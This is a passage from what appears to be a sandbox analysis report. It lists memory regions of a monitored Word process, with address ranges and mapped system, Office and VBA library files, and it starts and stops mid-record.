0xfca0000 end_va = 0x1006afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 512 start_va = 0x10070000 end_va = 0x1043dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010070000" filename = "" Region: id = 513 start_va = 0xcf90000 end_va = 0xd177fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 514 start_va = 0xfca0000 end_va = 0xfe8afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 515 start_va = 0xfca0000 end_va = 0x10067fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 516 start_va = 0x10070000 end_va = 0x10436fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010070000" filename = "" Region: id = 517 start_va = 0xcf90000 end_va = 0xd180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 518 start_va = 0xfca0000 end_va = 0xfe84fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 519 start_va = 0xcf90000 end_va = 0xd257fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 520 start_va = 0xfca0000 end_va = 0xff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 521 start_va = 0xff70000 end_va = 0x100d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff70000" filename = "" Region: id = 522 start_va = 0xcf90000 end_va = 0xd0f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf90000" filename = "" Region: id = 523 start_va = 0xfca0000 end_va = 0x1006dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 524 start_va = 0x10070000 end_va = 0x1043efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010070000" filename = "" Region: id = 525 start_va = 0x10440000 end_va = 0x1062cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010440000" filename = "" Region: id = 526 start_va = 0xfca0000 end_va = 0xfe87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 527 start_va = 0xfe90000 end_va = 0x10152fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe90000" filename = "" Region: id = 528 start_va = 0x10160000 end_va = 0x1052ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010160000" filename = "" Region: id = 529 start_va = 0x10530000 end_va = 0x1092ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010530000" filename = "" Region: id = 530 start_va = 0x8200000 end_va = 0x827ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{dd672c71-a44b-425d-97e3-545ba26d44f4}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{DD672C71-A44B-425D-97E3-545BA26D44F4}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{dd672c71-a44b-425d-97e3-545ba26d44f4}.tmp") Region: id = 531 start_va = 0x693e0000 end_va = 0x6965efff monitored = 1 entry_point = 0x6947bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~2\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 532 start_va = 0x69320000 end_va = 0x693defff monitored = 0 entry_point = 0x69331dfc region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\SysWOW64\\msvcr100.dll" (normalized: "c:\\windows\\syswow64\\msvcr100.dll") Region: id = 533 start_va = 0xb200000 end_va = 0xb2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b200000" filename = "" Region: id = 534 start_va = 0x7fe90000 end_va = 0x7fe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe90000" filename = "" Region: id = 535 start_va = 0xc40000 end_va = 0xc43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 536 start_va = 0x8040000 end_va = 0x8084fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 537 start_va = 0xc50000 end_va = 0xc53fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 538 start_va = 0xb200000 end_va = 0xb28dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 539 start_va = 0xb2a0000 end_va = 0xb2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2a0000" filename = "" Region: id = 540 start_va = 0x8090000 end_va = 0x80a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 541 start_va = 0xc60000 end_va = 0xc61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 542 start_va = 0x8280000 end_va = 0x8281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008280000" filename = "" Region: id = 543 start_va = 0x8290000 end_va = 0x8290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008290000" filename = "" Region: id = 544 start_va = 0xcf90000 end_va = 0xd076fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 545 start_va = 0xd080000 end_va = 0xd15cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrib.ttf" filename = "\\Windows\\Fonts\\calibrib.ttf" (normalized: "c:\\windows\\fonts\\calibrib.ttf") Region: id = 546 start_va = 0x10930000 end_va = 0x10b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010930000" filename = "" Region: id = 547 start_va = 0x69200000 end_va = 0x6931bfff monitored = 0 entry_point = 0x692674f0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\SysWOW64\\UIAutomationCore.dll" (normalized: "c:\\windows\\syswow64\\uiautomationcore.dll") Region: id = 548 start_va = 0x691e0000 end_va = 0x691f8fff monitored = 0 entry_point = 0x691e47e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 549 start_va = 0x8290000 end_va = 0x8290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008290000" filename = "" Region: id = 550 start_va = 0xd160000 end_va = 0xd25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 551 start_va = 0x10b30000 end_va = 0x10eecfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010b30000" filename = "" Region: id = 552 start_va = 0x10ef0000 end_va = 0x112acfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000010ef0000" filename = "" Region: id = 553 start_va = 0x82a0000 end_va = 0x82affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082a0000" filename = "" Region: id = 554 start_va = 0xb290000 end_va = 0xb29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b290000" filename = "" Region: id = 555 start_va = 0xb2b0000 end_va = 0xb2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2b0000" filename = "" Region: id = 556 start_va = 0xb2b0000 end_va = 0xb2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2b0000" filename = "" Region: id = 557 start_va = 0xfca0000 end_va = 0xfd39fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fca0000" filename = "" Region: id = 558 start_va = 0xb2b0000 end_va = 0xb2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2b0000" filename = "" Region: id = 559 start_va = 0xb2c0000 end_va = 0xb2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2c0000" filename = "" Region: id = 560 start_va = 0xb2d0000 end_va = 0xb2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2d0000" filename = "" Region: id = 561 start_va = 0xb2d0000 end_va = 0xb2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2d0000" filename = "" Region: id = 562 start_va = 0xb2e0000 end_va = 0xb2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2e0000" filename = "" Region: id = 563 start_va = 0xb2f0000 end_va = 0xb2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2f0000" filename = "" Region: id = 564 start_va = 0x76b50000 end_va = 0x76b54fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 565 start_va = 0xb2d0000 end_va = 0xb2e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 566 start_va = 0x691d0000 end_va = 0x691dafff monitored = 0 entry_point = 0x691d2150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 567 start_va = 0xb2f0000 end_va = 0xb2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b2f0000" filename = "" Region: id = 568 start_va = 0x69100000 end_va = 0x691c8fff monitored = 0 entry_point = 0x69113180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 569 start_va = 0x690e0000 end_va = 0x690fbfff monitored = 0 entry_point = 0x690e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 570 start_va = 0x690d0000 end_va = 0x690defff monitored = 0 entry_point = 0x690d3f00 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 571 start_va = 0xb300000 end_va = 0xb300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b300000" filename = "" Region: id = 572 start_va = 0xfd40000 end_va = 0xfe40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 573 start_va = 0xfd40000 end_va = 0xfe40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 574 start_va = 0xfd40000 end_va = 0xfe40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 575 start_va = 0xb300000 end_va = 0xb300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b300000" filename = "" Region: id = 576 start_va = 0xfd40000 end_va = 0xfe40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 577 start_va = 0xfd40000 end_va = 0xfe40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd40000" filename = "" Region: id = 578 start_va = 0x70a90000 end_va = 0x70ad0fff monitored = 0 entry_point = 0x70a97fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 579 start_va = 0xb300000 end_va = 0xb30ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b300000" filename = "" Region: id = 580 start_va = 0x69040000 end_va = 0x690c0fff monitored = 0 entry_point = 0x6905b260 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 581 start_va = 0xfd40000 end_va = 0xfe20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msword.olb") Region: id = 582 start_va = 0x112b0000 end_va = 0x114d5fff monitored = 1 entry_point = 0x112be058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 583 start_va = 0x68e00000 end_va = 0x69030fff monitored = 1 entry_point = 0x68e0e058 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 584 start_va = 0xb300000 end_va = 0xb301fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b300000" filename = "" Region: id = 585 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 586 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 587 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 588 start_va = 0xb310000 end_va = 0xb31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b310000" filename = "" Region: id = 589 start_va = 0xfe30000 end_va = 0xfe55fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 590 start_va = 0xb320000 end_va = 0xb32afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 591 start_va = 0xb330000 end_va = 0xb336fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b330000" filename = "" Region: id = 592 start_va = 0x68df0000 end_va = 0x68dfcfff monitored = 0 entry_point = 0x68df3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 593 start_va = 0x68d80000 end_va = 0x68de6fff monitored = 0 entry_point = 0x68d9b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 594 start_va = 0xd260000 end_va = 0xd26ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d260000" filename = "" Region: id = 595 start_va = 0xd260000 end_va = 0xd260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d260000" filename = "" Region: id = 596 start_va = 0xfe60000 end_va = 0xfe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe60000" filename = "" Region: id = 597 start_va = 0xded0000 end_va = 0xded2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ded0000" filename = "" Region: id = 598 start_va = 0xfe80000 end_va = 0xfe83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fe80000" filename = "" Region: id = 599 start_va = 0x112b0000 end_va = 0x112b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112b0000" filename = "" Region: id = 600 start_va = 0x68d60000 end_va = 0x68d70fff monitored = 0 entry_point = 0x68d68fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 601 start_va = 0x112c0000 end_va = 0x112c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112c0000" filename = "" Region: id = 602 start_va = 0x112d0000 end_va = 0x112d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112d0000" filename = "" Region: id = 603 start_va = 0x112e0000 end_va = 0x112fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112e0000" filename = "" Region: id = 604 start_va = 0x11300000 end_va = 0x11302fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011300000" filename = "" Region: id = 605 start_va = 0x11310000 end_va = 0x11324fff monitored = 1 entry_point = 0x113abfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 606 start_va = 0x11330000 end_va = 0x11334fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 607 start_va = 0x68ca0000 end_va = 0x68d5efff monitored = 0 entry_point = 0x68cd1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 608 start_va = 0x11340000 end_va = 0x113bbfff monitored = 0 entry_point = 0x11341000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 609 start_va = 0x113c0000 end_va = 0x113c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000113c0000" filename = "" Region: id = 610 start_va = 0x113d0000 end_va = 0x113d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000113d0000" filename = "" Region: id = 611 start_va = 0x9a40000 end_va = 0x9a42fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a40000" filename = "" Region: id = 612 start_va = 0x9a50000 end_va = 0x9a53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a50000" filename = "" Region: id = 613 start_va = 0x9a60000 end_va = 0x9a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a60000" filename = "" Region: id = 614 start_va = 0x9a80000 end_va = 0x9a82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a80000" filename = "" Region: id = 615 start_va = 0x9a90000 end_va = 0x9a95fff monitored = 1 entry_point = 0x9b2bfb8 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 616 start_va = 0x9aa0000 end_va = 0x9aa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009aa0000" filename = "" Region: id = 617 start_va = 0x9aa0000 end_va = 0x9adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009aa0000" filename = "" Region: id = 618 start_va = 0x9ae0000 end_va = 0x9bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ae0000" filename = "" Region: id = 619 start_va = 0x113e0000 end_va = 0x118d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000113e0000" filename = "" Region: id = 620 start_va = 0x9be0000 end_va = 0x9be3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009be0000" filename = "" Region: id = 621 start_va = 0x9bf0000 end_va = 0x9bf3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bf0000" filename = "" Region: id = 622 start_va = 0x9c00000 end_va = 0x9c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c00000" filename = "" Region: id = 623 start_va = 0x9c40000 end_va = 0x9d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c40000" filename = "" Region: id = 624 start_va = 0x118e0000 end_va = 0x11ba2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000118e0000" filename = "" Region: id = 625 start_va = 0x9d40000 end_va = 0x9eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 626 start_va = 0x11bb0000 end_va = 0x11d1afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 627 start_va = 0x9d40000 end_va = 0x9ea5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 628 start_va = 0x11bb0000 end_va = 0x11d1dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 629 start_va = 0x9d40000 end_va = 0x9ea4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 630 start_va = 0x68b50000 end_va = 0x68c9dfff monitored = 0 entry_point = 0x68b93000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\SysWOW64\\comsvcs.dll" (normalized: "c:\\windows\\syswow64\\comsvcs.dll") Region: id = 631 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 632 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 633 start_va = 0x68b20000 end_va = 0x68b42fff monitored = 0 entry_point = 0x68b27b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 634 start_va = 0x68b00000 end_va = 0x68b15fff monitored = 0 entry_point = 0x68b021d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 635 start_va = 0x9eb0000 end_va = 0x9eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009eb0000" filename = "" Region: id = 636 start_va = 0x118e0000 end_va = 0x119dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000118e0000" filename = "" Region: id = 637 start_va = 0x68ad0000 end_va = 0x68afafff monitored = 0 entry_point = 0x68ad9a70 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 638 start_va = 0x9ef0000 end_va = 0x9efcfff monitored = 0 entry_point = 0x9ef7b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 639 start_va = 0x119e0000 end_va = 0x11accfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119e0000" filename = "" Region: id = 640 start_va = 0x11ad0000 end_va = 0x11bb4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ad0000" filename = "" Region: id = 641 start_va = 0x68730000 end_va = 0x68ac0fff monitored = 0 entry_point = 0x689e35b0 region_type = mapped_file name = "d3dcompiler_47.dll" filename = "\\Windows\\SysWOW64\\D3DCompiler_47.dll" (normalized: "c:\\windows\\syswow64\\d3dcompiler_47.dll") Region: id = 642 start_va = 0x11bc0000 end_va = 0x11cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bc0000" filename = "" Region: id = 643 start_va = 0x9ef0000 end_va = 0x9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ef0000" filename = "" Region: id = 644 start_va = 0x9f00000 end_va = 0x9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 645 start_va = 0x9f10000 end_va = 0x9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 646 start_va = 0x9f20000 end_va = 0x9f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 647 start_va = 0x9f30000 end_va = 0x9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 648 start_va = 0x11cc0000 end_va = 0x11dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011cc0000" filename = "" Region: id = 649 start_va = 0x7fe80000 end_va = 0x7fe8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe80000" filename = "" Region: id = 650 start_va = 0x9f10000 end_va = 0x9f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 651 start_va = 0x119e0000 end_va = 0x119effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119e0000" filename = "" Region: id = 652 start_va = 0x119f0000 end_va = 0x119fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000119f0000" filename = "" Region: id = 653 start_va = 0x11a00000 end_va = 0x11a9cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011a00000" filename = "" Region: id = 654 start_va = 0x11aa0000 end_va = 0x11aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011aa0000" filename = "" Region: id = 655 start_va = 0x11ab0000 end_va = 0x11abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ab0000" filename = "" Region: id = 656 start_va = 0x11ac0000 end_va = 0x11acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ac0000" filename = "" Region: id = 657 start_va = 0x11dc0000 end_va = 0x11dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dc0000" filename = "" Region: id = 658 start_va = 0x11dd0000 end_va = 0x11ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dd0000" filename = "" Region: id = 659 start_va = 0x11aa0000 end_va = 0x11aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011aa0000" filename = "" Region: id = 660 start_va = 0x11ab0000 end_va = 0x11abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ab0000" filename = "" Region: id = 661 start_va = 0x11ac0000 end_va = 0x11acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ac0000" filename = "" Region: id = 662 start_va = 0x11dc0000 end_va = 0x11dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dc0000" filename = "" Region: id = 663 start_va = 0x11dd0000 end_va = 0x11ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dd0000" filename = "" Region: id = 664 start_va = 0x11de0000 end_va = 0x11deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011de0000" filename = "" Region: id = 665 start_va = 0x11de0000 end_va = 0x11deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011de0000" filename = "" Region: id = 666 start_va = 0x11df0000 end_va = 0x11dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011df0000" filename = "" Region: id = 667 start_va = 0x11e00000 end_va = 0x11e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e00000" filename = "" Region: id = 668 start_va = 0x11e10000 end_va = 0x11e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011e10000" filename = "" Region: id = 669 start_va = 0x11e20000 end_va = 